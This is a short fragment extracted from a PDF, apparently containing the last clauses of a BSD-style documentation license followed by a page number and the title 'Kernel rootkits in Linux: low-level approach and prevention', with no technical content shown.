2. Redistributions in compiled form (transformed to other DTDs, con-verted to PDF, PostScript, HTML, RTF, and other formats) mustreproduce the above copyright notice, this list of conditions and thefollowing disclaimer in the documentation and/or other materials pro-vided with the distribution.

3. The name of the author may not be used to endorse or promote prod-ucts derived from this documentation without specific prior writtenpermission.

26

Documents

Kernel rootkits in Linux: low-level approach and prevention